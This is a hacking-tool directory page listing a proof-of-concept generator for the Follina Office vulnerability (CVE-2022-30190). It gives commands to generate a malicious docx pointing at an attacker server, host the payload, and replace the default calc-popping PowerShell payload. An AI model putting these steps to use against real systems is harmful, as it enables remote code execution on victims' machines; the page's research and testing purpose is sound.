Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-30190 — MS-MSDT Follina CVE-2022-30190 PoC document generator | Kitploit
Tools/GitHubGitHub/sudoaza/cve-2022-30190
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubsudoaza/cve-2022-30190

CVE-2022-30190

MS-MSDT Follina CVE-2022-30190 PoC document generator

View Repository
724 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

MS-MSDT Follina CVE-2022-30190 PoC

Malicious docx generator to exploit (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on CVE-2021-40444 PoC by LockedByte and writeup by Tothi

Using

First modify backup.html and replace powershell payload. Right now just pops a calc.exe using IEX('calc.exe').

python3 exploit.py generate http://<SRV IP>

Document generation

Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80

Server

Finally try the docx in a Windows Virtual Machine:

Pop Calc

Download Tool